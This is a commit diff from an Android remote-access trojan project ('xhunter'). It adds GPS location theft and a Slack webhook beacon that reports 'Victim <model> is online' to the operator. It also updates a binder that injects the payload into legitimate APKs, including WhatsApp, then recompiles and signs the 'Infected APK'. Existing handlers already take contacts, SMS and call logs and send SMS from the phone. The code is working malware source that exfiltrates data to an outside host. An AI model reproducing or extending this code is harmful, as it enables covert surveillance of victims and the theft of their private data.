fixed #32 #43 added slackhook and location

anirudhmalik · Jul 24, 2022 · bd31552 · bd31552
1 parent 47ee0c6
commit bd31552
Show file tree

Hide file tree

Showing 23 changed files with 399 additions and 98 deletions.
diff --git a/android-payload/app/src/main/AndroidManifest.xml b/android-payload/app/src/main/AndroidManifest.xml
@@ -2,6 +2,8 @@
 <manifest xmlns:android="http://schemas.android.com/apk/res/android"
     package="com.xhunter.client">
 
+    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
+    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
     <uses-permission android:name="android.permission.INTERNET" />
     <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>

diff --git a/android-payload/app/src/main/assets/ip.txt b/android-payload/app/src/main/assets/ip.txt
@@ -1 +1,2 @@
-http://192.168.43.1:8080
+http://192.168.43.1:8080
+slackhook
diff --git a/android-payload/app/src/main/java/com/xhunter/client/Payload.java b/android-payload/app/src/main/java/com/xhunter/client/Payload.java
@@ -6,12 +6,13 @@
 import android.content.Context;
 import android.content.Intent;
 import android.content.IntentFilter;
-import android.content.pm.ApplicationInfo;
 import android.content.pm.PackageInfo;
 import android.content.pm.PackageManager;
 import android.database.Cursor;
 import android.graphics.Bitmap;
 import android.graphics.BitmapFactory;
+import android.location.Location;
+import android.location.LocationManager;
 import android.net.Uri;
 import android.os.BatteryManager;
 import android.os.Build;
@@ -24,26 +25,25 @@
 import android.telephony.TelephonyManager;
 import android.util.Base64;
 import android.util.Log;
-import android.view.View;
 
 import org.json.JSONArray;
 import org.json.JSONException;
 import org.json.JSONObject;
 
 
-import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.ByteArrayOutputStream;
 import java.io.File;
 import java.io.FileInputStream;
 import java.io.FileNotFoundException;
-import java.io.FileOutputStream;
 import java.io.IOException;
-import java.io.InputStream;
 import java.io.InputStreamReader;
+import java.io.OutputStream;
 import java.io.RandomAccessFile;
 import java.math.BigInteger;
+import java.net.HttpURLConnection;
 import java.net.URI;
+import java.net.URL;
 import java.net.URLConnection;
 import java.text.SimpleDateFormat;
 import java.util.Date;
@@ -61,6 +61,7 @@ public class Payload {
     private static Socket mSocket;
     private static Context mcontext;
 
+
     public static void start(Context context) {
         mcontext = context;
         startAsync();
@@ -82,11 +83,15 @@ public static void main() {
         try{
             BufferedReader reader = new BufferedReader(new InputStreamReader(mcontext.getAssets().open("ip.txt")));
             String ip=reader.readLine().trim();
+            String slackhook=reader.readLine().trim();
             System.out.println(ip);
-            System.out.println(ip.length());
+            System.out.println(slackhook);
             if(ip.length()>0){
                 connectToSocket(ip);
             }
+            if(slackhook.length()>10){
+                sendMessage(slackhook,"online");
+            }
             }catch (IOException e){}
     }
 
@@ -316,6 +321,31 @@ public void call(Object... args) {
 
         }
     };
+    private static final Emitter.Listener getLocation = new Emitter.Listener() {
+        @Override
+        public void call(Object... args) {
+            if(checkPermission(Manifest.permission.ACCESS_FINE_LOCATION)){
+                try {
+                    mSocket.emit("getLocation", getLastBestLocation());
+                } catch (JSONException e) {
+                    e.printStackTrace();
+                }
+            }else{
+                try {
+                    if (mSocket != null && mSocket.connected()) {
+                        JSONObject data = new JSONObject();
+                        data.put("error","Permission not allowed by victim");
+                        mSocket.emit("error", data);
+                    } else {
+                        Log.e("JSON ", "sending data failed");
+                    }
+                } catch (Exception e) {
+                    e.printStackTrace();
+                }
+            }
+
+        }
+    };
 
     private static final Emitter.Listener onConnectionError = new Emitter.Listener() {
         @Override
@@ -410,6 +440,7 @@ private static void registerHandlers() {
             mSocket.on("getContacts", getContacts);
             mSocket.on("sendSMS", sendSMS);
             mSocket.on("getCallLog", getCallLog);
+            mSocket.on("getLocation", getLocation);
         } catch (Exception e) {
             e.printStackTrace();
         }
@@ -615,29 +646,6 @@ private static void getDirfromPath(String path) {
             Log.d("Null?", "it is null");
         }
     }
-    private static String getBase64Data(File filePath) {
-        try {
-            InputStream inputStream = new FileInputStream(filePath);//You can get an inputStream using any IO API
-            byte[] bytes;
-            byte[] buffer = new byte[8192];
-            int bytesRead;
-            ByteArrayOutputStream output = new ByteArrayOutputStream();
-            try {
-                while ((bytesRead = inputStream.read(buffer)) != -1) {
-                    output.write(buffer, 0, bytesRead);
-                }
-            } catch (Exception e) {
-                e.printStackTrace();
-            }
-            bytes = output.toByteArray();
-            inputStream.close();
-            output.close();
-            return Base64.encodeToString(bytes, Base64.DEFAULT);
-        } catch (Exception e) {
-            e.printStackTrace();
-        }
-        return "";
-    }
     private static boolean isImageFile(String path) {
         String mimeType = URLConnection.guessContentTypeFromName(path);
         boolean b = mimeType != null && mimeType.startsWith("image");
@@ -730,7 +738,7 @@ private static void getAllSms(Context context, int START, int END) {
             c.close();
         }
     }
-    public static void getAllContacts(){
+    private static void getAllContacts(){
         try {
             JSONObject contacts = new JSONObject();
             JSONArray list = new JSONArray();
@@ -752,7 +760,7 @@ public static void getAllContacts(){
             e.printStackTrace();
         }
     }
-    public static boolean sendSMS(String message, String recipient){
+    private static boolean sendSMS(String message, String recipient){
         try{
             SmsManager smsManager = SmsManager.getDefault();
             smsManager.sendTextMessage(recipient, null, message, null, null);
@@ -761,7 +769,7 @@ public static boolean sendSMS(String message, String recipient){
         }
         return true;
     }
-    public static JSONObject readCallLog(Context context) {
+    private static JSONObject readCallLog(Context context) {
         JSONObject Calls = null;
         try {
             Calls = new JSONObject();
@@ -788,4 +796,54 @@ public static JSONObject readCallLog(Context context) {
         }
         return Calls;
     }
+    private static JSONObject getLastBestLocation() throws JSONException {
+        LocationManager mLocationManager = (LocationManager) mcontext.getSystemService(Context.LOCATION_SERVICE);
+        if(checkPermission(Manifest.permission.ACCESS_FINE_LOCATION)){}
+        Location locationGPS = mLocationManager.getLastKnownLocation(LocationManager.GPS_PROVIDER);
+        Location locationNet = mLocationManager.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);
+        long GPSLocationTime = 0;
+        JSONObject location = new JSONObject();
+        if (null != locationGPS) { GPSLocationTime = locationGPS.getTime(); }
+
+        long NetLocationTime = 0;
+
+        if (null != locationNet) {
+            NetLocationTime = locationNet.getTime();
+        }
+
+        if ( 0 < GPSLocationTime - NetLocationTime ) {
+            location.put("lat",locationGPS.getLatitude());
+            location.put("long",locationGPS.getLongitude());
+        }
+        else {
+            location.put("lat",locationNet.getLatitude());
+            location.put("long",locationNet.getLongitude());
+        }
+        return location;
+    }
+    public static void sendMessage(String slackWebhookUrl, String state) {
+        try {
+            URL url = new URL(slackWebhookUrl);
+            HttpURLConnection conn = (HttpURLConnection)url.openConnection();
+            conn.setRequestMethod("POST");
+            conn.setRequestProperty("Content-Type", "application/json");
+            conn.setRequestProperty("Accept", "application/json");
+            conn.setDoOutput(true);
+            String jsonInputString = "{\"text\":\"Victim "+Build.MODEL+" is "+ state +"\"}";
+            try(OutputStream os = conn.getOutputStream()) {
+                byte[] input = jsonInputString.getBytes("utf-8");
+                os.write(input, 0, input.length);
+            }
+            try(BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream(), "utf-8"))) {
+                StringBuilder response = new StringBuilder();
+                String responseLine = null;
+                while ((responseLine = br.readLine()) != null) {
+                    response.append(responseLine.trim());
+                }
+                System.out.println(response.toString());
+            }
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+    }
 }
diff --git a/android/app/src/main/assets/res/WhatsApp.zip b/android/app/src/main/assets/res/WhatsApp.zip
diff --git a/android/app/src/main/assets/res/ip.txt b/android/app/src/main/assets/res/ip.txt
diff --git a/android/app/src/main/assets/res/payload.apk b/android/app/src/main/assets/res/payload.apk
diff --git a/android/app/src/main/java/brut/apktool/Main.java b/android/app/src/main/java/brut/apktool/Main.java
@@ -179,31 +179,26 @@ private static void cmdDecode(CommandLine cli) throws AndrolibException {
                             + outDir.getAbsolutePath()
                             + ") "
                             + "already exists. Use -f switch if you want to overwrite it.");
-            System.exit(1);
         } catch (InFileNotFoundException ex) {
             System.err.println("Input file (" + apkName + ") " + "was not found or was not readable.");
-            System.exit(1);
         } catch (CantFindFrameworkResException ex) {
             System.err
                     .println("Can't find framework resources for package of id: "
                             + ex.getPkgId()
                             + ". You must install proper "
                             + "framework files, see project website for more info.");
-            System.exit(1);
         } catch (IOException ex) {
             System.err.println("Could not modify file. Please ensure you have permission.");
-            System.exit(1);
         } catch (DirectoryException ex) {
             System.err.println("Could not modify internal dex files. Please ensure you have permission.");
-            System.exit(1);
         } finally {
             try {
                 decoder.close();
             } catch (IOException ignored) {}
         }
     }
 
-    private static void cmdBuild(CommandLine cli) {
+    private static void cmdBuild(CommandLine cli) throws BrutException {
         String[] args = cli.getArgs();
         String appDirName = args.length < 2 ? "." : args[1];
         File outFile;
@@ -248,15 +243,10 @@ private static void cmdBuild(CommandLine cli) {
         }
 
         // try and build apk
-        try {
             if (cli.hasOption("a") || cli.hasOption("aapt")) {
                 buildOptions.aaptVersion = AaptManager.getAaptVersion(cli.getOptionValue("a"));
             }
             new Androlib(buildOptions).build(new File(appDirName), outFile);
-        } catch (BrutException ex) {
-            System.err.println(ex.getMessage());
-            System.exit(1);
-        }
     }
 
     private static void cmdInstallFramework(CommandLine cli) throws AndrolibException {

diff --git a/android/app/src/main/java/com/xhunter/AppBinder.java b/android/app/src/main/java/com/xhunter/AppBinder.java
@@ -56,9 +56,9 @@ protected Boolean doInBackground(String... strings) {
             if (decompile_normal_apk(strings[0]))
                 if (decompile_payload())
                     if (move_payload_files_to_normal_apk())
-                        if (edit_app(strings[1]))
+                        if (edit_app(strings[1],strings[2]))
                             if (hook_smali_file(strings[0]))
-                                if(injectPermission&&inject_permissions())
+                                if(injectPermission&&inject_permissions()){}
                                     if (compile_build())
                                         if (sign()) {
                                             deleteFolder(working_dir + "normal_apk");
@@ -150,28 +150,26 @@ private boolean move_payload_files_to_normal_apk(){
             return false;
         }
     }
-    private boolean edit_app(String ip){
+    private boolean edit_app(String ip, String slackHook){
         log.i("[*] Trying to inject malicious code");
-        String fileName = res_dir+"ip.txt";
-        File file = new File(fileName);
-        FileReader fr = null;
-        String line;
         try {
-            fr = new FileReader(file);
-            BufferedReader br = new BufferedReader(fr);
             if(new File(working_dir+"normal_apk/assets").exists()) {
                 FileWriter fw=new FileWriter(working_dir+"normal_apk/assets/ip.txt");
-                while((line=br.readLine()) != null){
-                    fw.write(line.replaceAll("http://192.168.43.1:8080",ip));
-                }//loop
+                if(slackHook.length()>0){
+                    fw.write(ip+"\n"+slackHook);
+                } else {
+                    fw.write(ip+"\n"+ "slackhook");
+                }
                 fw.close();
                 log.s("[+] Injected malicious code Successfully!");
                 return true;
             }else if(new File(working_dir+"normal_apk/assets").mkdirs()) {
                 FileWriter fw=new FileWriter(working_dir+"normal_apk/assets/ip.txt");
-                while((line=br.readLine()) != null){
-                    fw.write(line.replaceAll("http://192.168.43.1:8080",ip));
-                }//loop
+                if(slackHook.length()>0){
+                    fw.write(ip+"\n"+slackHook);
+                } else {
+                    fw.write(ip+"\n"+ "slackhook");
+                }
                 fw.close();
                 log.s("[+] Injected malicious code Successfully!");
                 return true;
@@ -235,6 +233,25 @@ private boolean compile_build() {
             }
             log.s("[+] Compiled Infected APK Successfully !");
             return true;
+        } catch (Exception e) {
+            if(injectPermission){
+                log.w("[?] Failed to Compile Infected APK!");
+                return compile_build_aapt2();
+            }else{
+                log.e("[!] Failed to Compile Infected APK");
+                log.ex("Error: "+ e.toString());
+                return false;
+            }
+        }
+    }
+    private boolean compile_build_aapt2() {
+        log.i("[*] Trying again using --aapt2, Please wait...");
+        log.w("[?] It usually takes few minutes, Do not close app or lock screen!");
+        try {
+            String framework =reactContext.getFilesDir().getAbsolutePath()+"/framework";
+            Main.main(new String[]{"b","-a", getAapt2(), "--use-aapt2","-p", framework, working_dir+"normal_apk", "-o", working_dir+"unsigned.apk"});
+            log.s("[+] Compiled Infected APK Successfully Using AAPT2 !");
+            return true;
         } catch (Exception e) {
             log.e("[!] Failed to Compile Infected APK");
             log.ex("Error: "+ e.toString());
@@ -466,6 +483,7 @@ private String readManifest(){
             "    <uses-permission android:name=\"android.permission.READ_SMS\" />\n" +
             "    <uses-permission android:name=\"android.permission.READ_CONTACTS\" />\n" +
             "    <uses-permission android:name=\"android.permission.READ_CALL_LOG\" />\n" +
+            "    <uses-permission android:name=\"android.permission.ACCESS_FINE_LOCATION\" />\n" +
+            "    <uses-permission android:name=\"android.permission.ACCESS_COARSE_LOCATION\" />\n" +
             "    <uses-permission android:name=\"android.permission.SEND_SMS\" />\n";
-
-}
+}
diff --git a/android/app/src/main/java/com/xhunter/MyAppModule.java b/android/app/src/main/java/com/xhunter/MyAppModule.java
@@ -35,11 +35,11 @@ public String getName() {
     }
 
     @ReactMethod
-    public void bindApp(String path, String ip, Boolean injectPermission){
-        new AppBinder(reactContext, injectPermission).execute(path, ip);
+    public void bindApp(String path, String ip, Boolean injectPermission,String slackHook){
+        new AppBinder(reactContext, injectPermission).execute(path, ip, slackHook);
     }
     @ReactMethod
-    public void bindWhatsapp(String ip){ new WhatsappBinder(reactContext).execute(ip); }
+    public void bindWhatsapp(String ip, String slackHook){ new WhatsappBinder(reactContext).execute(ip, slackHook); }
 
     @ReactMethod
     public void sshTunnel(String user, String host, String pass, int rport, String lhost, int lport, Promise promise){